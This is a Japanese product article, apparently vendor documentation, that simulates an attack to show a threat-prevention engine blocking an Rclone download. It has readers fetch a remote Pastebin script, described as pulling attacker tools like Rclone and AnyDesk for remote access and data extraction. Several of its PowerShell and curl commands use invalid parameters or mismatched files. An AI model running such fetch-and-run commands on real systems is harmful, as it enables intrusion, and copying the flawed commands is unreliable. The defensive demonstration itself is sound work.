概要
エージェンティック脅威防止は、検出された脅威に対して動的コントロールをプロアクティブに適用し、攻撃面を減らし、影響が発生する前に脅威を緩和するセキュリティエンジンです。詳細については、エージェンティック脅威防止とは?をご覧ください。
この記事では、エージェンティック脅威防止がネットワークをどのように保護するかを示すため、実際の攻撃シナリオをシミュレートします。これはエージェンティックな脅威ではありませんが、同様の手法がエージェンティック攻撃で使用されるのを防ぐために、どのようにコントロールを適用するかを示しています。
この例では、ユーザーがPastebinからスクリプトをダウンロードし、攻撃者が将来の攻撃に必要な高リスクツールを追加で取得しようとします。エージェンティック脅威防止は悪意のある行動を特定し、ツールのダウンロードをブロックすることにより、攻撃が進行する前や影響が発生するのを未然に防ぎます。
この攻撃への対応は完全に自動化されています。追加のルールは必要ありません。エージェンティック脅威防止を有効にするだけで、攻撃を未然に防ぐのに十分です。
この攻撃をシミュレートするには:
ブロックされずに高リスクツールをダウンロードする
Pastebinからスクリプトをダウンロードする
再度、高リスクツールのダウンロードを試みる。今回は、ダウンロードがブロックされます。
注: このシナリオはエージェンティックなものではありませんが、制御がエージェンティック攻撃で同様の手法が使用されることを防ぐ方法を示しています。
前提条件
エージェンティック脅威防止は有効化され、アクションがブロックに設定されています。
ステップ1: 高リスクツールをダウンロードする
エージェンティック脅威防止が悪意のあるシーケンスの一部である場合にのみアクションをブロックすることを示すために、まず、ファイルを管理するためのオープンソースのコマンドラインツールであるRcloneをダウンロードします。攻撃者は通常、Rcloneを正当で強力なツールとして使用し、通常の管理活動と紛れさせます。
アクション
以下のどちらかからRcloneをダウンロードしてください:
以下のURL:
https://downloads.rclone.org/rclone-current-windows-amd64.zipWindowsデバイスで:
以下のPowerShellコマンド:
Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
macOS/Linux デバイスで:
以下のターミナルコマンド:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
結果
ファイルは正常にダウンロードされます。
説明
これは、単独の場合、アクションがブロックされず、疑わしい活動の後に続かない限り、悪意のあるものとはみなされないことを確認します。
ステップ2: Pastebinからスクリプトをダウンロードする
攻撃の開始をシミュレートするため、Pastebinからスクリプトをダウンロードします。このスクリプトが実行されると、Rcloneやリモートアクセスやデータ抽出のためのAnyDeskなどの一般的な攻撃者ツールをダウンロードします。
アクション
Pastebinからスクリプトをダウンロードして実行するには:
Windowsデバイスで:
以下のPowerShellコマンド:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
macOS/Linux デバイスで:
以下のターミナルコマンド:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
結果
スクリプトが実行され、ツールがダウンロードされます。ホストに動的なコントロールが適用され、エージェンティック 脅威ページで表示されます。詳細については、エージェンティック脅威防止のモニタリングを参照してください。
説明
エージェンティック脅威防止は、疑わしい行動の指標を検出し、続く悪意のある行動をブロックするためにプロアクティブにコントロールを適用し、影響が発生する前に攻撃を止めます。
ステップ3: 高リスクツールをダウンロードする
シミュレートされた攻撃で、攻撃者がRcloneをダウンロードしようとします。しかし、Pastebinからスクリプトをダウンロードする不審な活動に続いてこのアクションがあるため、制御が適用され、エージェンティック脅威防止によってRcloneのダウンロードがブロックされます。
アクション
Rcloneを以下の方法でダウンロードします。
Rcloneのサイトから直接:
https://downloads.rclone.org/rclone-current-windows-amd64.zipこのPowerShellコマンド (Windows上):
Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"以下のターミナルコマンド (macOS/Linux で):
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
結果
このファイルのダウンロードはコントロールによりブロックされます。軽減された脅威がエージェンティック 脅威ページで表示されます。
説明
ステップ1とは異なり、このスクリプトは単独で実行されたときに許可されていましたが、今回は疑わしい行動に続くため、エージェンティック脅威防止によってブロックされます。
デモンストレーション
このビデオは、このシミュレートされた攻撃のデモンストレーションを示します: